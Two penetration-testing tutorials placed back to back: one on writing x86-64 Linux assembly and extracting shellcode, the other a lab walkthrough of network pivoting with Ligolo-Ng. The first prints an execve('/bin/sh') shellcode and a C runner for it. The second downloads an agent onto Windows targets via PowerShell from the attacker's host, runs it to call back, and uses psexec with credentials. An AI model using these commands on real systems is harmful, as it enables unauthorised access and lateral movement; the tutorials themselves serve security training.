64-bit Linux Assembly and Shellcoding

Introduction

Shellcodes are machine instructions that are used as a payload in the exploitation of a vulnerability. An exploit is a small code that targets a vulnerability. Shellcodes are written in assembly. We generally refer to sites like shell-storm.org to get shellcodes and attach them to our exploits. But how can we make our shellcodes?

This series of articles focuses on creating our shellcodes. In Part 1, we'd be understanding basic assembly instructions, writing our very first assembly code, and turning that into a shell code.

Table of Content

l  Understanding CPU Registers

l  First Assembly Program

l  Assembling and Linking

l  Extracting Shellcode

l  Removing NULLs

l  A sample shellcode execution

l  Conclusion

Understanding CPU registers

"Assembly is the language of OS." We have all read this in our computer science textbooks in high school. But how is assembly written? How is the assembly language able to control our CPU? How do we make our assembly program?

Before going into assembly, let's understand our CPU registers. An x86-64 CPU has various 8-byte (64-bit) registers that can be used to store data, do computation, and other tasks. These registers are physical and embedded in the chip. They are lightning-fast and exponentially faster than the hard disk memory. If we can write a program only using registers, the time required to run it would virtually be instantaneous.

A CPU contains a Control Unit, Execution Unit among other things. This execution unit talks to Registers and Flags.



There are many registers on the CPU. But for this part, we only need to know about the general-purpose registers.



64-bit registers

(ref: researchgate.net)

So, in the image above we can see that there are legacy 8 registers (RAX, RBX, RCX, RDX, RDI, RSI, RBP, RSP) and then R8 to R15. These are the general-purpose registers. CPU may also have others like MMX which we'll encounter later on.

Out of these, these 4 data registers are:

RAX - Accumulator. Used for input/output and most arithmetic operations.

RBX - Base Register. Used for stack's index addressing

RCX - Count Register. Used for counting, like a loop counter.

RDX - Data register. Used in I/O operations along with RAX for multiply/divide involving large values.

Again, this is just the given function. We can modify and use these registers in other ways we like.

Next, 3 pointer registers are:

RIP - Instruction Pointer. Stores the offset of the next instruction to be executed.

RSP - Stack Pointer. Stores the memory address of the top of the stack.

RBP - Base Pointer. Makes the base of the stack frame for the current function. This makes it easier to access function parameters and local variables at fixed offsets from the RBP register. eg: RBP-4 would store the first integer variable defined in the program.

Finally, there are 2 Index registers:

RSI - Source Index. It is used as as source index for string operations mainly.

RDI - Destination Index. It is used as a destination index for string operations mainly.

 

Apart from these we have some control registers as well, known as flags. These flags hold values 0 and 1 for set and unset. Some of these are:

CF - Carry Flag. Used for carry and borrow in mathematical operations.

PF - Parity Flag. Used for errors while processing arithmeetic operations. If number of “1” bits are even then PF=0 else it is set as 1.

ZF - Zero Flag. Used to indicate the result of a previous operation. This would be used as the input  of other operations like JZ,JNZ etc.

Now we are ready to write our first program in assembly.

First Assembly Program

An assembly program is written with usually 3 main sections:

1.      Text section - Program instructions are stored here

2.      Data section - Defined data is stored here

3.      BSS section - Undefined data is stored here.

It is also to note that there are 2 main assembly flavors in Linux 64-bit Assembly: AT&T syntax and Intel syntax.

If you have used GDB before, you’ll notice it automatically displays the assembly in AT&T syntax. This is a personal preference. Some people like seeing their assembly in this, but we would be using the Intel syntax because it seems a lot clearer.

Let's write our first "Hello World" program.

We always start by defining our skeleton code. I'll create a file with the extension ".asm"



We always start by defining a global directive. Since, unlike C, we don't have a main function here to tell the compiler where a program starts from, in assembly, we use the symbol "_start" to define the start of the program. In section .text, we define the _start label to tell the assembler to start instructions from this point.

For full details about global directives, refer to this post.

Now, we have to define a message "Hello World." Since this is a piece of data, it must come in .data section



This is how variables are declared:

<variable>: <data type> <value>

The name of the variable is “message”. It is defined as a sequence of bytes (db=define bytes) and ends with an end line (0xa is the hex value for "\n").

For full details about data types in assembly, refer to this post.

Now that we have declared a message, we need instructions to print it.

It is important to know that assembly also uses the underlying system calls in an OS. In Linux OS, there are currently 456 system calls which are defined in /usr/include/x86-64-linux-gnu/unistd_64.h

You can also find an online searchable table here: https://filippo.io/linux-syscall-table/

The syscall used to print a message is "write." It uses these arguments:





So, these syscalls essentially also use different registers to process and perform a task. Upon knowing more about what syscall requires in these registers we'd be able to perform any syscall. To perform write, we need these values in these registers:

rax -> 1

rdi -> 1 (stdout in Linux is defined by fd=1)

rsi -> Message to display

rdx -> length of the message (which is 12 including end line)

But how do we input these values in these registers? For this, in Assembly, there are many instructions. The most common instruction is “mov.” This moves values from:

l  Between registers

l  Memory to Registers and Registers to Memory

l  Immediate data to registers

l  Immediate data to memory

So, we will just move these values into dedicated registers and our code becomes like this:



However, manually calculating the length of messages may not be feasible. So, we'll use a little trick. We'll define a new variable for length and use "equ" which means equals proceeded by "$" which denotes the current offset and subtract our message's beginning offset from this to find the length of the message.

We would further need to use the instruction "syscall" to also call the "write" syscall we just defined. Without using the "syscall" operation, write won't be performed with register values.



Finally, we also need to exit from the program. sys_exit syscall in Linux performs this operation.



So, rax-> 60

And rdi-> any value we want for the error code. Let's give this 0 for now.



Assembling and Linking

Now this code is ready to run. We always need to do these steps to run an assembly code:

1.      Assemble using nasm

2.      Link with necessary libraries using ld

An assembler produces object files as output. We then link it with necessary libraries that contain the definition of certain instructions and create an executable. We will use “nasm” to do the assembling and “ld” to link.

Since it is a 64-bit elf that we want, the command would become:

nasm -f elf64 1.asm -o 1.o

ld 1.o -o 1

./1



As we see, we have now generated an executable file that is printing "hello world." Perfect. We can now proceed to create our shellcode using this binary.

Extracting shellcode

We created our assembly code and made an executable out of it that prints something. Let's say a poor exploit (not a good one, haha) wants to exploit something with the payload to print “Hello World”. How would one do this?

For this, we need to extract the instruction bytes from our executable. We can use objdump to do this

Upon seeing the binary with objdump, we can see our assembly code and the instructions in hex written alongside it. We are providing -M intel because we want the output in Intel assembly format.

objdump -d 1 -M intel



We all know computers only know binary. However, displaying binary on screen is not feasible. So, computer scientists used hex instructions. This gets translated into the CPU and the computer acts.

Removing NULLs

We need to extract these bytes and use them in our C code! Simple? BUT WAIT!

Another fundamental we know is that null bytes can sometimes terminate an action. So we must remove these null bytes from our shellcode to prevent any mishappening. To exactly know which instructions won't generate null bytes comes with practice. But certain tricks can be used in simple programs to achieve this.

For example, using "xor rax,rax" would assign rax=0 since xoring anything with itself gives 0.



So, we can do "xor rax,rax" and then "add rax,1" to make RAX as 1.

In our code, you'll observe every mov instruction creates 0s. So, if we have to assign a value of “1”, we can xor to make it 0 and then “add” 1. “Add” instruction simply adds the value given to the register mentioned.

Following this trick we can re-write our code like this:



Let's see if we still have 0s or not.



We can still observe some 0s in movabs and mov instructions. We can use some tricks to reduce these 0s further.



This would still produce 0s near mov rsi, message. We can reduce this by using "lea." “lea” command loads an address into the memory. This is also known as the “memory referencing.” We’ll see the details in a future article on rel and memory referencing.



We can still see 2 null bytes there but for now, this is workable. We can use the "jmp call pop" technique to remove this as well. Let's talk about that in further articles.



This binary also works. Let's extract these bytes and make it a shellcode. We can copy these manually too (tiring!) but let's use a command line fu for this:

objdump -d ./PROGRAM | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'



Shellcode: \x48\x31\xc0\x48\x83\xc0\x01\x48\x31\xff\x48\x83\xc7\x01\x48\x8d\x35\xeb\x0f\x00\x00\x48\x31\xd2\x48\x83\xc2\x0c\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05

 

 

Sample shellcode execution

The shellcode we just created can not be executed in C programs because “Hello World” was being fetched as static data. For this, we will utilize another technique called JMP, CALL, and POP. This we will cover in the next article. For this part, let’s focus on executing a ready-made shellcode.

 

On sites like shell-storm.org, you would observe that the assembly of a program is given, and then the related shellcode as well. For example, here we see that an assembly program is written to execute “execve(/bin/sh)” which spawns up a new shell using the Linux system call “execve”

 



The shellcode observed is: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

 

To execute this shellcode, we need to write a small C program. Here is a skeleton:

 

#include <stdio.h>

#include <string.h>

 

char code[] = "<shellcode>";

 

int main()

{

    printf("len:%zu bytes\n", strlen(code));

    (*(void(*)()) code)();

    return 0;

}

 

So, the code becomes like so and we have to compile it with no modern compiler protections command. Also, note that we are using Ubuntu 14 to test our shellcode since even after no protections, modern systems may still block the execution of such shellcodes (due to memory permissions or ASLR issues) which we will tackle in future articles.

 



 

Now, we can run this binary and observe how it spawns a new shell!



 

 

Conclusion

 

In the article, we saw how we can write out our assembly programs using registers and Linux syscalls, make an executable, and then extract the instruction bytes using objdump. These instruction bytes can then be used as a payload in exploits. That is why it is called a shellcode. We created our shellcode which prints “Hello World” but we didn’t execute it in the C program. The reason was that “Hello World” was static data in the program that couldn’t be properly loaded in registers using the assembly we created. For this, we have to use a technique called JMP, CALL, POP and utilize stack for it. We shall see this in the next article. Thanks for reading this part of the series.

A Detailed Guide on Ligolo-Ng

This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool's unique features to practical applications such as single and double pivoting within a network.

Download Ligolo-Ng:

Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.

Table of Contents:

1.       Introduction to Ligolo-Ng

2.       Ligolo V/S Chisel

3.       Lab Setup

4.       Prerequisites

5.       Setting up Ligolo-Ng

6.       Single Pivoting

7.       Double Pivoting

Ligolo-Ng Overview:

Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.

Ligolo V/S Chisel:

  • Ligolo-Ng outperforms Chisel in terms of speed and customization options.
  • Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
  • Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
  • Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.

 

 

Lab Setup

Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.

 


Prerequisites

Obtain the Ligolo 'agent' file for Windows 64-bit and the 'proxy' file for Linux 64-bit.

Install the 'agent' file on the target machine and the 'proxy' file on the attacking machine (Kali Linux).



Setting up Ligolo-Ng

Step1: Following the acquisition of both the agent and proxy files, the next step involves the setup of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the 'ifconfig' command is employed. To initiate activation, execute the prescribed sequence of commands as follows:

 

ip tuntap add user root mode tun ligolo

ip link set ligolo up

Verify Ligolo-Ng activation with: ‘ifconfig’ command



Step2: Unzip the Ligolo proxy file:

tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz

This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the 'help' command

./proxy -h



Step 3: The options displayed in the preceding image are designed for incorporating various types of certificates with the proxy. The chosen approach involves utilizing the '-selfcert' option, which operates on port 11601. Execute the provided command, as illustrated in the accompanying image below:

./proxy -selfcert



Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command:

unzip ligolo-ng_agent_0.5.1_windows_amd64.zip

To facilitate the transmission of this agent file to the target, establish a server with the command:

updog -p 80



Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands:

cd Desktop

powershell wget 192.168.1.5/agent.exe -o agent.exe

dir



Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file.

./agent.exe -connect 192.168.1.5:11601 -ignore-cert



Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the 'session' command, opting for '1' to access the active session. Following the session establishment, execute the 'ifconfig' command as illustrated in the provided image.

Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.



Single Pivoting

In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network

 A.


 

Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due to different network configuration.



To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands:

ip route add 192.168.148.0/24 dev ligolo

ip route list



Return to the Ligolo proxy session window and initiate the tunneling process by entering the 'start' command, as demonstrated in the provided image.

 


Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.



Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.



Double Pivoting

 

In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.

 


 

From the newly opened terminal window, utilize the Impacket tool to access the identified Windows 10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download the Ligolo agent onto Windows 10

Impacket-psexec administrator:123@192.168.148.132

cd c:\users\public

powershell wget 192.168.1.5/agent.exe -o agent.exe

dir



Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational.

agent.exe -connect 192.168.1.5:11601 -ignore-cert

 


Examine Ligo-ng proxy server, a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the 'start' command to initiate additional tunneling.

 


Execute the 'session' command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the 'ifconfig' command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.

 


Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C.



Add the Network C Subnet in the IP route list with the following command.

ip route add 192.168.159.0/24 dev ligolo

ip route list

 


 

With the modification of our IP route, the next step involves the addition of a listener to traverse the intra-network and retrieve the session. To incorporate the listener, utilize the following command:

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444



The image above confirms the activation of the listener. To initiate tunneling, refer to available options using the help command. It becomes evident that halting the ongoing tunneling in session 1 is necessary before starting the process in session 2. This step-by-step approach facilitates the transfer of data to the listener, which subsequently retrieves the necessary information. This operational technique, known as double pivoting, involves stopping the initial tunneling in the first session using the 'stop' command. In second session, execute the 'start' command, following the steps illustrated in the image below.

 


Executing double pivoting was successful, and its verification occurred through the utilization of crackmapexec with the command:

crackmapexec smb 192.168.159.0/24

Discovering Metasploitable2 within the network followed. This led to the ability to conduct a ping and nmap scan, leveraging the acquired network access, as illustrated in the image below: